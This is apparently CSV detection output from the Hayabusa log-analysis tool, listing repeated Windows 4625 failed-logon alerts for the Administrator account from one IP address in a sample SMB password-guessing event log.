2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQ1hvZeT9aulbu4g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75RBCjr2eRDLhTqW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: maMlpuzhleuQHhIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkpNfbOHUr7cY52z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7SUyYbLPfPAGUfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7clwftf7R0uNbqJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IsIyPcMAPnlxJa12  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CKcyo1Ec4rs3Z2g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZlzKvZLO8CDotkbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyRpYYtmD8389Yvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t3Pg0H9Gncoyr45m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zksaaJ7Z1wuy4PMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WdYAEdfWxLdM1rh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VyYFJRy0cxPfqDFh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv2Lz1h1bG6UatVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FLKPLfEe3PpEzRNc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJWv7ggzCSyEznOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZUtR9CNfKMHQMd7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6fYNHuRTqi15cRkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DvxZHwJwrBYXlEyv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jscJTJjhKvCtDl8q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZEIEjcimMyHWUsp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 30OdVRH9ZATLezsR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJ1OSBVZHKmyOzj8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JanG6Q0oYpTdm9mC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PWCwDYL3T7TAdb0J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRdyZaio1HjUKlNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VjiRnExy9TzZTG0R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztUyQpl8c9RoAr1j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jC23QAFM07q7cfVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TSM8lmdOFoDslQNa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sGZaUGAT1oXmnGLB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMNo21pTA67pb7Go  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiTZCqK3m4icL1Vi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZaZ2mnoihX1Ec4di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ihm9zaXkmWklXk4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yLIZ3tlw9VlQmK28  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GVHzJHTi55NbxXYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1FROeEnMLna2fTTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pio6ZZ9pV0pS2Whi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h1aD2w5U5K9ND5HV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zF8Jb4GpG4D3xn9i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edv4GwGfL156V1xe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Irvneva9RFn44iII  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dHtJFI8OL9kJylL5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F5Q4h62T77hGjhKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdSALwo9td9xUeBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1kYfoqz1r1NuEn04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7X400gufqdunUa8j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lLR8z7g0GY8r7a1r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHMztrxiKBGtNqkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eBQevVhmZs5gHFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lyQCs0PG6fGzpidu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnsPjnCieyoFIbJZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ku6mjVaG1lCJrAo1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VwiyVIWHOGuHzhdO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92v1rXcj5c0Lt3OF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yO2JYd6FfM2Y7px9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ltr5g8ZWUAdrPKxg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fjiPMy5uOTbbmaQ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HDRVOzxca9wDJziV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DV28RjUK26Je2Dr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seoetT43w0S3FEss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IdIU9Q9Ig4Bd3Aps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGzuHSHT59Qnp5jI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPA1J7aQrZ064WSf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhLFXDMUKGfdoc4S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: apVAhc6o3dhLmUll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYMdQeB4ZpFm8xDh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QewW1ISqRdXwtSXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SFhBcgZfc9VZ5S8S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a4ZSRW7F65yDNbJd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
